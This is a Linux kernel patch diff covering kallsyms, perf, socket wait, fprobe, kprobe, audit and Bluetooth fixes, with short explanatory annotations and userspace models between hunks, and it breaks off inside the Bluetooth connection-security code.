++int iio_device_claim_buffer_mode(struct iio_dev *indio_dev);
++void iio_device_release_buffer_mode(struct iio_dev *indio_dev);
+ 
+ extern struct bus_type iio_bus_type;
+ 
+diff --git a/include/linux/kallsyms.h b/include/linux/kallsyms.h
+index 649faac31ddb1..0cd33be7142ad 100644
+--- a/include/linux/kallsyms.h
++++ b/include/linux/kallsyms.h
+@@ -69,6 +69,8 @@ static inline void *dereference_symbol_descriptor(void *ptr)
+ int kallsyms_on_each_symbol(int (*fn)(void *, const char *, struct module *,
+ 				      unsigned long),
+ 			    void *data);
++int kallsyms_on_each_match_symbol(int (*fn)(void *, unsigned long),
++				  const char *name, void *data);
+ 
+ /* Lookup the address for a symbol. Returns 0 if not found. */
+ unsigned long kallsyms_lookup_name(const char *name);
+@@ -168,6 +170,12 @@ static inline int kallsyms_on_each_symbol(int (*fn)(void *, const char *, struct
+ {
+ 	return -EOPNOTSUPP;
+ }
++
++static inline int kallsyms_on_each_match_symbol(int (*fn)(void *, unsigned long),
++						const char *name, void *data)
++{
++	return -EOPNOTSUPP;
++}
+ #endif /*CONFIG_KALLSYMS*/
+ 
+ static inline void print_ip_sym(const char *loglvl, unsigned long ip)
+diff --git a/include/linux/perf_event.h b/include/linux/perf_event.h
+index 63fae3c7ae430..1578a4de1f3cb 100644
+--- a/include/linux/perf_event.h
++++ b/include/linux/perf_event.h
+@@ -694,6 +694,7 @@ struct perf_event {
+ 	/* The cumulative AND of all event_caps for events in this group. */
+ 	int				group_caps;
+ 
++	unsigned int			group_generation;
+ 	struct perf_event		*group_leader;
+ 	struct pmu			*pmu;
+ 	void				*pmu_private;
+diff --git a/include/net/bluetooth/hci_core.h b/include/net/bluetooth/hci_core.h
+index ddbcbf9ccb2ce..583aebd8c1e01 100644
+--- a/include/net/bluetooth/hci_core.h
++++ b/include/net/bluetooth/hci_core.h
+@@ -348,7 +348,7 @@ struct hci_dev {
+ 	struct list_head list;
+ 	struct mutex	lock;
+ 
+-	char		name[8];
++	const char	*name;
+ 	unsigned long	flags;
+ 	__u16		id;
+ 	__u8		bus;
+diff --git a/include/net/bluetooth/hci_mon.h b/include/net/bluetooth/hci_mon.h
+index 2d5fcda1bcd05..082f89531b889 100644
+--- a/include/net/bluetooth/hci_mon.h
++++ b/include/net/bluetooth/hci_mon.h
+@@ -56,7 +56,7 @@ struct hci_mon_new_index {
+ 	__u8		type;
+ 	__u8		bus;
+ 	bdaddr_t	bdaddr;
+-	char		name[8];
++	char		name[8] __nonstring;
+ } __packed;
+ #define HCI_MON_NEW_INDEX_SIZE 16
+ 
+diff --git a/include/net/ip_fib.h b/include/net/ip_fib.h
+index f0c13864180e2..15de07d365405 100644
+--- a/include/net/ip_fib.h
++++ b/include/net/ip_fib.h
+@@ -154,6 +154,7 @@ struct fib_info {
+ 	int			fib_nhs;
+ 	bool			fib_nh_is_v6;
+ 	bool			nh_updated;
++	bool			pfsrc_removed;
+ 	struct nexthop		*nh;
+ 	struct rcu_head		rcu;
+ 	struct fib_nh		fib_nh[];
+diff --git a/include/net/netns/xfrm.h b/include/net/netns/xfrm.h
+index bd7c3be4af5d7..423b52eca908d 100644
+--- a/include/net/netns/xfrm.h
++++ b/include/net/netns/xfrm.h
+@@ -50,6 +50,7 @@ struct netns_xfrm {
+ 	struct list_head	policy_all;
+ 	struct hlist_head	*policy_byidx;
+ 	unsigned int		policy_idx_hmask;
++	unsigned int		idx_generator;
+ 	struct hlist_head	policy_inexact[XFRM_POLICY_MAX];
+ 	struct xfrm_policy_hash	policy_bydst[XFRM_POLICY_MAX];
+ 	unsigned int		policy_count[XFRM_POLICY_MAX * 2];
+diff --git a/include/net/sock.h b/include/net/sock.h
+index fe695e8bfe289..a1fcbb2a8a2ce 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -333,7 +333,7 @@ struct sk_filter;
+   *	@sk_cgrp_data: cgroup data for this cgroup
+   *	@sk_memcg: this socket's memory cgroup association
+   *	@sk_write_pending: a write to stream socket waits to start
+-  *	@sk_wait_pending: number of threads blocked on this socket
++  *	@sk_disconnects: number of disconnect operations performed on this sock
+   *	@sk_state_change: callback to indicate change in the state of the sock
+   *	@sk_data_ready: callback to indicate there is data to be processed
+   *	@sk_write_space: callback to indicate there is bf sending space available
+@@ -426,7 +426,7 @@ struct sock {
+ 	unsigned int		sk_napi_id;
+ #endif
+ 	int			sk_rcvbuf;
+-	int			sk_wait_pending;
++	int			sk_disconnects;
+ 
+ 	struct sk_filter __rcu	*sk_filter;
+ 	union {
+@@ -1185,8 +1185,7 @@ static inline void sock_rps_reset_rxhash(struct sock *sk)
+ }
+ 
+ #define sk_wait_event(__sk, __timeo, __condition, __wait)		\
+-	({	int __rc;						\
+-		__sk->sk_wait_pending++;				\
++	({	int __rc, __dis = __sk->sk_disconnects;			\
+ 		release_sock(__sk);					\
+ 		__rc = __condition;					\
+ 		if (!__rc) {						\
+@@ -1196,8 +1195,7 @@ static inline void sock_rps_reset_rxhash(struct sock *sk)
+ 		}							\
+ 		sched_annotate_sleep();					\
+ 		lock_sock(__sk);					\
+-		__sk->sk_wait_pending--;				\
+-		__rc = __condition;					\
++		__rc = __dis == __sk->sk_disconnects ? __condition : -EPIPE; \
+ 		__rc;							\
+ 	})
+ 
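The sk_wait_event() rewrite above replaces the sk_wait_pending counter with a disconnect generation check: the counter is sampled before the socket lock is released, and if it changed while the thread slept, the wait reports -EPIPE instead of re-evaluating the condition. A simplified userspace model of that check:

#include <errno.h>

struct sock_model { int disconnects; };

/* condition() stands in for the macro's __condition expression. */
static int wait_event_model(struct sock_model *sk,
			    int (*condition)(struct sock_model *))
{
	int gen = sk->disconnects;	/* sample before dropping the lock */

	/* release_sock(), sleep, lock_sock() would happen here */

	/* A disconnect while sleeping invalidates the wait entirely. */
	return gen == sk->disconnects ? condition(sk) : -EPIPE;
}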
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index 9ebb54122bb71..548c75c8a34c7 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -141,6 +141,9 @@ void tcp_time_wait(struct sock *sk, int state, int timeo);
+ #define TCP_RTO_MAX	((unsigned)(120*HZ))
+ #define TCP_RTO_MIN	((unsigned)(HZ/5))
+ #define TCP_TIMEOUT_MIN	(2U) /* Min timeout for TCP timers in jiffies */
++
++#define TCP_TIMEOUT_MIN_US (2*USEC_PER_MSEC) /* Min TCP timeout in microsecs */
++
+ #define TCP_TIMEOUT_INIT ((unsigned)(1*HZ))	/* RFC6298 2.1 initial RTO value	*/
+ #define TCP_TIMEOUT_FALLBACK ((unsigned)(3*HZ))	/* RFC 1122 initial RTO value, now
+ 						 * used as a fallback RTO for the
+diff --git a/include/trace/events/neigh.h b/include/trace/events/neigh.h
+index 5eaa1fa991715..833143d0992e0 100644
+--- a/include/trace/events/neigh.h
++++ b/include/trace/events/neigh.h
+@@ -39,7 +39,6 @@ TRACE_EVENT(neigh_create,
+ 	),
+ 
+ 	TP_fast_assign(
+-		struct in6_addr *pin6;
+ 		__be32 *p32;
+ 
+ 		__entry->family = tbl->family;
+@@ -47,7 +46,6 @@ TRACE_EVENT(neigh_create,
+ 		__entry->entries = atomic_read(&tbl->gc_entries);
+ 		__entry->created = n != NULL;
+ 		__entry->gc_exempt = exempt_from_gc;
+-		pin6 = (struct in6_addr *)__entry->primary_key6;
+ 		p32 = (__be32 *)__entry->primary_key4;
+ 
+ 		if (tbl->family == AF_INET)
+@@ -57,6 +55,8 @@ TRACE_EVENT(neigh_create,
+ 
+ #if IS_ENABLED(CONFIG_IPV6)
+ 		if (tbl->family == AF_INET6) {
++			struct in6_addr *pin6;
++
+ 			pin6 = (struct in6_addr *)__entry->primary_key6;
+ 			*pin6 = *(struct in6_addr *)pkey;
+ 		}
+diff --git a/kernel/auditsc.c b/kernel/auditsc.c
+index a2240f54fc224..c5f41fc75d543 100644
+--- a/kernel/auditsc.c
++++ b/kernel/auditsc.c
+@@ -2208,7 +2208,7 @@ __audit_reusename(const __user char *uptr)
+ 		if (!n->name)
+ 			continue;
+ 		if (n->name->uptr == uptr) {
+-			n->name->refcnt++;
++			atomic_inc(&n->name->refcnt);
+ 			return n->name;
+ 		}
+ 	}
+@@ -2237,7 +2237,7 @@ void __audit_getname(struct filename *name)
+ 	n->name = name;
+ 	n->name_len = AUDIT_NAME_FULL;
+ 	name->aname = n;
+-	name->refcnt++;
++	atomic_inc(&name->refcnt);
+ }
+ 
+ static inline int audit_copy_fcaps(struct audit_names *name,
+@@ -2369,7 +2369,7 @@ out_alloc:
+ 		return;
+ 	if (name) {
+ 		n->name = name;
+-		name->refcnt++;
++		atomic_inc(&name->refcnt);
+ 	}
+ 
+ out:
+@@ -2496,7 +2496,7 @@ void __audit_inode_child(struct inode *parent,
+ 		if (found_parent) {
+ 			found_child->name = found_parent->name;
+ 			found_child->name_len = AUDIT_NAME_FULL;
+-			found_child->name->refcnt++;
++			atomic_inc(&found_child->name->refcnt);
+ 		}
+ 	}
+ 
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index db1065daabb62..2b8315a948a2c 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -1962,6 +1962,7 @@ static void perf_group_attach(struct perf_event *event)
+ 
+ 	list_add_tail(&event->sibling_list, &group_leader->sibling_list);
+ 	group_leader->nr_siblings++;
++	group_leader->group_generation++;
+ 
+ 	perf_event__header_size(group_leader);
+ 
+@@ -2156,6 +2157,7 @@ static void perf_group_detach(struct perf_event *event)
+ 	if (leader != event) {
+ 		list_del_init(&event->sibling_list);
+ 		event->group_leader->nr_siblings--;
++		event->group_leader->group_generation++;
+ 		goto out;
+ 	}
+ 
+@@ -5279,7 +5281,7 @@ static int __perf_read_group_add(struct perf_event *leader,
+ 					u64 read_format, u64 *values)
+ {
+ 	struct perf_event_context *ctx = leader->ctx;
+-	struct perf_event *sub;
++	struct perf_event *sub, *parent;
+ 	unsigned long flags;
+ 	int n = 1; /* skip @nr */
+ 	int ret;
+@@ -5289,6 +5291,33 @@ static int __perf_read_group_add(struct perf_event *leader,
+ 		return ret;
+ 
+ 	raw_spin_lock_irqsave(&ctx->lock, flags);
++	/*
++	 * Verify the grouping between the parent and child (inherited)
++	 * events is still in tact.
++	 * events is still intact.
++	 * Specifically:
++	 *  - leader->ctx->lock pins leader->sibling_list
++	 *  - parent->child_mutex pins parent->child_list
++	 *  - parent->ctx->mutex pins parent->sibling_list
++	 *
++	 * Because parent->ctx != leader->ctx (and child_list nests inside
++	 * ctx->mutex), group destruction is not atomic between children, also
++	 * see perf_event_release_kernel(). Additionally, parent can grow the
++	 * group.
++	 *
++	 * Therefore it is possible to have parent and child groups in a
++	 * different configuration and summing over such a beast makes no
++	 * sense whatsoever.
++	 *
++	 * Reject this.
++	 */
++	parent = leader->parent;
++	if (parent &&
++	    (parent->group_generation != leader->group_generation ||
++	     parent->nr_siblings != leader->nr_siblings)) {
++		ret = -ECHILD;
++		goto unlock;
++	}
+ 
+ 	/*
+ 	 * Since we co-schedule groups, {enabled,running} times of siblings
+@@ -5322,8 +5351,9 @@ static int __perf_read_group_add(struct perf_event *leader,
+ 			values[n++] = atomic64_read(&sub->lost_samples);
+ 	}
+ 
++unlock:
+ 	raw_spin_unlock_irqrestore(&ctx->lock, flags);
+-	return 0;
++	return ret;
+ }
+ 
+ static int perf_read_group(struct perf_event *event,
+@@ -5342,10 +5372,6 @@ static int perf_read_group(struct perf_event *event,
+ 
+ 	values[0] = 1 + leader->nr_siblings;
+ 
+-	/*
+-	 * By locking the child_mutex of the leader we effectively
+-	 * lock the child list of all siblings.. XXX explain how.
+-	 */
+ 	mutex_lock(&leader->child_mutex);
+ 
+ 	ret = __perf_read_group_add(leader, read_format, values);
+@@ -13267,6 +13293,7 @@ static int inherit_group(struct perf_event *parent_event,
+ 		    !perf_get_aux_event(child_ctr, leader))
+ 			return -EINVAL;
+ 	}
++	leader->group_generation = parent_event->group_generation;
+ 	return 0;
+ }
+ 
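The group_generation counter added above is bumped on every attach and detach, and inherited children start from the parent's value, so __perf_read_group_add() can cheaply detect that a parent and child group have diverged. A stripped-down sketch of the consistency test, with stand-in types:

#include <errno.h>

struct event {
	unsigned int group_generation;	/* bumped on attach/detach */
	int nr_siblings;
	struct event *parent;		/* NULL unless inherited */
};

static int group_intact(const struct event *leader)
{
	const struct event *parent = leader->parent;

	if (parent &&
	    (parent->group_generation != leader->group_generation ||
	     parent->nr_siblings != leader->nr_siblings))
		return -ECHILD;		/* groups no longer line up */
	return 0;
}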
+diff --git a/kernel/kallsyms.c b/kernel/kallsyms.c
+index ad3cccb0970f8..824bcc7b5dbc3 100644
+--- a/kernel/kallsyms.c
++++ b/kernel/kallsyms.c
+@@ -197,6 +197,16 @@ static int compare_symbol_name(const char *name, char *namebuf)
+ 	return strcmp(name, namebuf);
+ }
+ 
++static unsigned int get_symbol_seq(int index)
++{
++	unsigned int i, seq = 0;
++
++	for (i = 0; i < 3; i++)
++		seq = (seq << 8) | kallsyms_seqs_of_names[3 * index + i];
++
++	return seq;
++}
++
+ static int kallsyms_lookup_names(const char *name,
+ 				 unsigned int *start,
+ 				 unsigned int *end)
+@@ -211,7 +221,7 @@ static int kallsyms_lookup_names(const char *name,
+ 
+ 	while (low <= high) {
+ 		mid = low + (high - low) / 2;
+-		seq = kallsyms_seqs_of_names[mid];
++		seq = get_symbol_seq(mid);
+ 		off = get_symbol_offset(seq);
+ 		kallsyms_expand_symbol(off, namebuf, ARRAY_SIZE(namebuf));
+ 		ret = compare_symbol_name(name, namebuf);
+@@ -228,7 +238,7 @@ static int kallsyms_lookup_names(const char *name,
+ 
+ 	low = mid;
+ 	while (low) {
+-		seq = kallsyms_seqs_of_names[low - 1];
++		seq = get_symbol_seq(low - 1);
+ 		off = get_symbol_offset(seq);
+ 		kallsyms_expand_symbol(off, namebuf, ARRAY_SIZE(namebuf));
+ 		if (compare_symbol_name(name, namebuf))
+@@ -240,7 +250,7 @@ static int kallsyms_lookup_names(const char *name,
+ 	if (end) {
+ 		high = mid;
+ 		while (high < kallsyms_num_syms - 1) {
+-			seq = kallsyms_seqs_of_names[high + 1];
++			seq = get_symbol_seq(high + 1);
+ 			off = get_symbol_offset(seq);
+ 			kallsyms_expand_symbol(off, namebuf, ARRAY_SIZE(namebuf));
+ 			if (compare_symbol_name(name, namebuf))
+@@ -265,7 +275,7 @@ unsigned long kallsyms_lookup_name(const char *name)
+ 
+ 	ret = kallsyms_lookup_names(name, &i, NULL);
+ 	if (!ret)
+-		return kallsyms_sym_address(kallsyms_seqs_of_names[i]);
++		return kallsyms_sym_address(get_symbol_seq(i));
+ 
+ 	return module_kallsyms_lookup_name(name);
+ }
+@@ -293,6 +303,24 @@ int kallsyms_on_each_symbol(int (*fn)(void *, const char *, struct module *,
+ 	return 0;
+ }
+ 
++int kallsyms_on_each_match_symbol(int (*fn)(void *, unsigned long),
++				  const char *name, void *data)
++{
++	int ret;
++	unsigned int i, start, end;
++
++	ret = kallsyms_lookup_names(name, &start, &end);
++	if (ret)
++		return 0;
++
++	for (i = start; !ret && i <= end; i++) {
++		ret = fn(data, kallsyms_sym_address(get_symbol_seq(i)));
++		cond_resched();
++	}
++
++	return ret;
++}
++
+ static unsigned long get_symbol_pos(unsigned long addr,
+ 				    unsigned long *symbolsize,
+ 				    unsigned long *offset)
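kallsyms_seqs_of_names changes from an array of unsigned int to packed 3-byte entries, which is why every lookup now goes through get_symbol_seq(). A standalone decode of the same big-endian packing:

#include <stdint.h>

/* Each entry occupies three big-endian bytes in the table. */
static unsigned int decode_seq(const uint8_t *seqs_of_names, int index)
{
	unsigned int i, seq = 0;

	for (i = 0; i < 3; i++)
		seq = (seq << 8) | seqs_of_names[3 * index + i];

	return seq;
}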
+diff --git a/kernel/kallsyms_internal.h b/kernel/kallsyms_internal.h
+index a04b7a5cb1e3e..27fabdcc40f57 100644
+--- a/kernel/kallsyms_internal.h
++++ b/kernel/kallsyms_internal.h
+@@ -26,6 +26,6 @@ extern const char kallsyms_token_table[] __weak;
+ extern const u16 kallsyms_token_index[] __weak;
+ 
+ extern const unsigned int kallsyms_markers[] __weak;
+-extern const unsigned int kallsyms_seqs_of_names[] __weak;
++extern const u8 kallsyms_seqs_of_names[] __weak;
+ 
+ #endif // LINUX_KALLSYMS_INTERNAL_H_
+diff --git a/kernel/sched/cpufreq_schedutil.c b/kernel/sched/cpufreq_schedutil.c
+index 1207c78f85c11..853a07618a3cf 100644
+--- a/kernel/sched/cpufreq_schedutil.c
++++ b/kernel/sched/cpufreq_schedutil.c
+@@ -345,7 +345,8 @@ static void sugov_update_single_freq(struct update_util_data *hook, u64 time,
+ 	 * Except when the rq is capped by uclamp_max.
+ 	 */
+ 	if (!uclamp_rq_is_capped(cpu_rq(sg_cpu->cpu)) &&
+-	    sugov_cpu_is_busy(sg_cpu) && next_f < sg_policy->next_freq) {
++	    sugov_cpu_is_busy(sg_cpu) && next_f < sg_policy->next_freq &&
++	    !sg_policy->need_freq_update) {
+ 		next_f = sg_policy->next_freq;
+ 
+ 		/* Restore cached freq as next_freq has changed */
+diff --git a/kernel/trace/bpf_trace.c b/kernel/trace/bpf_trace.c
+index 8c77c54e6348b..f4a494a457c52 100644
+--- a/kernel/trace/bpf_trace.c
++++ b/kernel/trace/bpf_trace.c
+@@ -2646,7 +2646,7 @@ kprobe_multi_link_prog_run(struct bpf_kprobe_multi_link *link,
+ 
+ static void
+ kprobe_multi_link_handler(struct fprobe *fp, unsigned long fentry_ip,
+-			  struct pt_regs *regs)
++			  struct pt_regs *regs, void *data)
+ {
+ 	struct bpf_kprobe_multi_link *link;
+ 
+diff --git a/kernel/trace/fprobe.c b/kernel/trace/fprobe.c
+index 1322247ce6488..f386d6bd8e0e3 100644
+--- a/kernel/trace/fprobe.c
++++ b/kernel/trace/fprobe.c
+@@ -17,14 +17,16 @@
+ struct fprobe_rethook_node {
+ 	struct rethook_node node;
+ 	unsigned long entry_ip;
++	char data[];
+ };
+ 
+ static void fprobe_handler(unsigned long ip, unsigned long parent_ip,
+ 			   struct ftrace_ops *ops, struct ftrace_regs *fregs)
+ {
+ 	struct fprobe_rethook_node *fpr;
+-	struct rethook_node *rh;
++	struct rethook_node *rh = NULL;
+ 	struct fprobe *fp;
++	void *entry_data = NULL;
+ 	int bit;
+ 
+ 	fp = container_of(ops, struct fprobe, ops);
+@@ -37,9 +39,6 @@ static void fprobe_handler(unsigned long ip, unsigned long parent_ip,
+ 		return;
+ 	}
+ 
+-	if (fp->entry_handler)
+-		fp->entry_handler(fp, ip, ftrace_get_regs(fregs));
+-
+ 	if (fp->exit_handler) {
+ 		rh = rethook_try_get(fp->rethook);
+ 		if (!rh) {
+@@ -48,9 +47,16 @@ static void fprobe_handler(unsigned long ip, unsigned long parent_ip,
+ 		}
+ 		fpr = container_of(rh, struct fprobe_rethook_node, node);
+ 		fpr->entry_ip = ip;
+-		rethook_hook(rh, ftrace_get_regs(fregs), true);
++		if (fp->entry_data_size)
++			entry_data = fpr->data;
+ 	}
+ 
++	if (fp->entry_handler)
++		fp->entry_handler(fp, ip, ftrace_get_regs(fregs), entry_data);
++
++	if (rh)
++		rethook_hook(rh, ftrace_get_regs(fregs), true);
++
+ out:
+ 	ftrace_test_recursion_unlock(bit);
+ }
+@@ -81,7 +87,8 @@ static void fprobe_exit_handler(struct rethook_node *rh, void *data,
+ 
+ 	fpr = container_of(rh, struct fprobe_rethook_node, node);
+ 
+-	fp->exit_handler(fp, fpr->entry_ip, regs);
++	fp->exit_handler(fp, fpr->entry_ip, regs,
++			 fp->entry_data_size ? (void *)fpr->data : NULL);
+ }
+ NOKPROBE_SYMBOL(fprobe_exit_handler);
+ 
+@@ -127,7 +134,7 @@ static int fprobe_init_rethook(struct fprobe *fp, int num)
+ {
+ 	int i, size;
+ 
+-	if (num < 0)
++	if (num <= 0)
+ 		return -EINVAL;
+ 
+ 	if (!fp->exit_handler) {
+@@ -136,9 +143,12 @@ static int fprobe_init_rethook(struct fprobe *fp, int num)
+ 	}
+ 
+ 	/* Initialize rethook if needed */
+-	size = num * num_possible_cpus() * 2;
+-	if (size < 0)
+-		return -E2BIG;
++	if (fp->nr_maxactive)
++		size = fp->nr_maxactive;
++	else
++		size = num * num_possible_cpus() * 2;
++	if (size <= 0)
++		return -EINVAL;
+ 
+ 	fp->rethook = rethook_alloc((void *)fp, fprobe_exit_handler);
+ 	if (!fp->rethook)
+@@ -146,7 +156,7 @@ static int fprobe_init_rethook(struct fprobe *fp, int num)
+ 	for (i = 0; i < size; i++) {
+ 		struct fprobe_rethook_node *node;
+ 
+-		node = kzalloc(sizeof(*node), GFP_KERNEL);
++		node = kzalloc(sizeof(*node) + fp->entry_data_size, GFP_KERNEL);
+ 		if (!node) {
+ 			rethook_free(fp->rethook);
+ 			fp->rethook = NULL;
+diff --git a/kernel/trace/trace_events.c b/kernel/trace/trace_events.c
+index 9da418442a063..2e3dce5e2575e 100644
+--- a/kernel/trace/trace_events.c
++++ b/kernel/trace/trace_events.c
+@@ -2777,6 +2777,7 @@ void trace_event_eval_update(struct trace_eval_map **map, int len)
+ 				update_event_fields(call, map[i]);
+ 			}
+ 		}
++		cond_resched();
+ 	}
+ 	up_write(&trace_event_sem);
+ }
+diff --git a/kernel/trace/trace_kprobe.c b/kernel/trace/trace_kprobe.c
+index 5a75b039e5860..22852029c6924 100644
+--- a/kernel/trace/trace_kprobe.c
++++ b/kernel/trace/trace_kprobe.c
+@@ -705,6 +705,25 @@ static struct notifier_block trace_kprobe_module_nb = {
+ 	.priority = 1	/* Invoked after kprobe module callback */
+ };
+ 
++static int count_symbols(void *data, unsigned long unused)
++{
++	unsigned int *count = data;
++
++	(*count)++;
++
++	return 0;
++}
++
++static unsigned int number_of_same_symbols(char *func_name)
++{
++	unsigned int count;
++
++	count = 0;
++	kallsyms_on_each_match_symbol(count_symbols, func_name, &count);
++
++	return count;
++}
++
+ static int __trace_kprobe_create(int argc, const char *argv[])
+ {
+ 	/*
+@@ -834,6 +853,31 @@ static int __trace_kprobe_create(int argc, const char *argv[])
+ 		}
+ 	}
+ 
++	if (symbol && !strchr(symbol, ':')) {
++		unsigned int count;
++
++		count = number_of_same_symbols(symbol);
++		if (count > 1) {
++			/*
++			 * Users should use ADDR to remove the ambiguity of
++			 * using KSYM only.
++			 */
++			trace_probe_log_err(0, NON_UNIQ_SYMBOL);
++			ret = -EADDRNOTAVAIL;
++
++			goto error;
++		} else if (count == 0) {
++			/*
++			 * We can return ENOENT earlier than when registering
++			 * the kprobe.
++			 */
++			trace_probe_log_err(0, BAD_PROBE_ADDR);
++			ret = -ENOENT;
++
++			goto error;
++		}
++	}
++
+ 	trace_probe_log_set_index(0);
+ 	if (event) {
+ 		ret = traceprobe_parse_event_name(&event, &group, gbuf,
+@@ -1744,6 +1788,7 @@ static int unregister_kprobe_event(struct trace_kprobe *tk)
+ }
+ 
+ #ifdef CONFIG_PERF_EVENTS
++
+ /* create a trace_kprobe, but don't add it to global lists */
+ struct trace_event_call *
+ create_local_trace_kprobe(char *func, void *addr, unsigned long offs,
+@@ -1754,6 +1799,24 @@ create_local_trace_kprobe(char *func, void *addr, unsigned long offs,
+ 	int ret;
+ 	char *event;
+ 
++	if (func) {
++		unsigned int count;
++
++		count = number_of_same_symbols(func);
++		if (count > 1)
++			/*
++			 * Users should use addr to remove the ambiguity of
++			 * using func only.
++			 */
++			return ERR_PTR(-EADDRNOTAVAIL);
++		else if (count == 0)
++			/*
++			 * We can return ENOENT earlier than when registering
++			 * the kprobe.
++			 */
++			return ERR_PTR(-ENOENT);
++	}
++
+ 	/*
+ 	 * local trace_kprobes are not added to dyn_event, so they are never
+ 	 * searched in find_trace_kprobe(). Therefore, there is no concern of
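Both call sites above rely on the same idiom: kallsyms_on_each_match_symbol() walks every address bound to a name, and a trivial callback counts the hits so ambiguous (count > 1) or missing (count == 0) symbols can be rejected up front. A generic sketch of that callback-count idiom, where for_each() stands in for the kallsyms iterator:

static int count_cb(void *data, unsigned long addr)
{
	unsigned int *count = data;

	(void)addr;
	(*count)++;
	return 0;	/* returning non-zero would stop the walk */
}

static unsigned int count_matches(const char *name,
				  int (*for_each)(int (*)(void *, unsigned long),
						  const char *, void *))
{
	unsigned int count = 0;

	for_each(count_cb, name, &count);
	return count;
}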
+diff --git a/kernel/trace/trace_probe.h b/kernel/trace/trace_probe.h
+index f41c330bd60f1..f48b3ed20b095 100644
+--- a/kernel/trace/trace_probe.h
++++ b/kernel/trace/trace_probe.h
+@@ -404,6 +404,7 @@ extern int traceprobe_define_arg_fields(struct trace_event_call *event_call,
+ 	C(BAD_MAXACT,		"Invalid maxactive number"),		\
+ 	C(MAXACT_TOO_BIG,	"Maxactive is too big"),		\
+ 	C(BAD_PROBE_ADDR,	"Invalid probed address or symbol"),	\
++	C(NON_UNIQ_SYMBOL,	"The symbol is not unique"),		\
+	C(BAD_RETPROBE,		"Retprobe address must be a function entry"), \
+ 	C(BAD_ADDR_SUFFIX,	"Invalid probed address suffix"), \
+ 	C(NO_GROUP_NAME,	"Group name is not specified"),		\
+diff --git a/lib/Kconfig.debug b/lib/Kconfig.debug
+index 12dfe6691dd52..4db0199651f56 100644
+--- a/lib/Kconfig.debug
++++ b/lib/Kconfig.debug
+@@ -1219,13 +1219,16 @@ config DEBUG_TIMEKEEPING
+ config DEBUG_PREEMPT
+ 	bool "Debug preemptible kernel"
+ 	depends on DEBUG_KERNEL && PREEMPTION && TRACE_IRQFLAGS_SUPPORT
+-	default y
+ 	help
+ 	  If you say Y here then the kernel will use a debug variant of the
+ 	  commonly used smp_processor_id() function and will print warnings
+ 	  if kernel code uses it in a preemption-unsafe way. Also, the kernel
+ 	  will detect preemption count underflows.
+ 
++	  This option has the potential to introduce high runtime overhead,
++	  depending on the workload, as it triggers debugging routines for
++	  each this_cpu operation. It should only be used for debugging
++	  purposes.
++
+ menu "Lock Debugging (spinlocks, mutexes, etc...)"
+ 
+ config LOCK_DEBUGGING_SUPPORT
+diff --git a/lib/test_fprobe.c b/lib/test_fprobe.c
+index e0381b3ec410c..34fa5a5bbda1f 100644
+--- a/lib/test_fprobe.c
++++ b/lib/test_fprobe.c
+@@ -30,7 +30,8 @@ static noinline u32 fprobe_selftest_target2(u32 value)
+ 	return (value / div_factor) + 1;
+ }
+ 
+-static notrace void fp_entry_handler(struct fprobe *fp, unsigned long ip, struct pt_regs *regs)
++static notrace void fp_entry_handler(struct fprobe *fp, unsigned long ip,
++				     struct pt_regs *regs, void *data)
+ {
+ 	KUNIT_EXPECT_FALSE(current_test, preemptible());
+ 	/* This can be called on the fprobe_selftest_target and the fprobe_selftest_target2 */
+@@ -39,7 +40,8 @@ static notrace void fp_entry_handler(struct fprobe *fp, unsigned long ip, struct
+ 	entry_val = (rand1 / div_factor);
+ }
+ 
+-static notrace void fp_exit_handler(struct fprobe *fp, unsigned long ip, struct pt_regs *regs)
++static notrace void fp_exit_handler(struct fprobe *fp, unsigned long ip,
++				    struct pt_regs *regs, void *data)
+ {
+ 	unsigned long ret = regs_return_value(regs);
+ 
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index 61059571c8779..728be9307f526 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -1583,6 +1583,15 @@ struct hci_conn *hci_connect_acl(struct hci_dev *hdev, bdaddr_t *dst,
+ 		return ERR_PTR(-EOPNOTSUPP);
+ 	}
+ 
++	/* Reject outgoing connection to device with same BD ADDR against
++	 * CVE-2020-26555
++	 */
++	if (!bacmp(&hdev->bdaddr, dst)) {
++		bt_dev_dbg(hdev, "Reject connection with same BD_ADDR %pMR\n",
++			   dst);
++		return ERR_PTR(-ECONNREFUSED);
++	}
++
+ 	acl = hci_conn_hash_lookup_ba(hdev, ACL_LINK, dst);
+ 	if (!acl) {
+ 		acl = hci_conn_add(hdev, ACL_LINK, dst, HCI_ROLE_MASTER);
+@@ -2355,34 +2364,41 @@ int hci_conn_security(struct hci_conn *conn, __u8 sec_level, __u8 auth_type,
+ 	if (!test_bit(HCI_CONN_AUTH, &conn->flags))
+ 		goto auth;
+ 
+-	/* An authenticated FIPS approved combination key has sufficient
+-	 * security for security level 4. */
+-	if (conn->key_type == HCI_LK_AUTH_COMBINATION_P256 &&
+-	    sec_level == BT_SECURITY_FIPS)
+-		goto encrypt;
+-
+-	/* An authenticated combination key has sufficient security for
+-	   security level 3. */
+-	if ((conn->key_type == HCI_LK_AUTH_COMBINATION_P192 ||
+-	     conn->key_type == HCI_LK_AUTH_COMBINATION_P256) &&
+-	    sec_level == BT_SECURITY_HIGH)
+-		goto encrypt;
+-
+-	/* An unauthenticated combination key has sufficient security for
+-	   security level 1 and 2. */
+-	if ((conn->key_type == HCI_LK_UNAUTH_COMBINATION_P192 ||
+-	     conn->key_type == HCI_LK_UNAUTH_COMBINATION_P256) &&
+-	    (sec_level == BT_SECURITY_MEDIUM || sec_level == BT_SECURITY_LOW))
+-		goto encrypt;
+-
+-	/* A combination key has always sufficient security for the security
+-	   levels 1 or 2. High security level requires the combination key
+-	   is generated using maximum PIN code length (16).
+-	   For pre 2.1 units. */
+-	if (conn->key_type == HCI_LK_COMBINATION &&
+-	    (sec_level == BT_SECURITY_MEDIUM || sec_level == BT_SECURITY_LOW ||
+-	     conn->pin_length == 16))
+-		goto encrypt;
++	switch (conn->key_type) {
++	case HCI_LK_AUTH_COMBINATION_P256:
++		/* An authenticated FIPS approved combination key has
++		 * sufficient security for security level 4 or lower.
++		 */
++		if (sec_level <= BT_SECURITY_FIPS)
++			goto encrypt;
++		break;
++	case HCI_LK_AUTH_COMBINATION_P192:
++		/* An authenticated combination key has sufficient security for
++		 * security level 3 or lower.
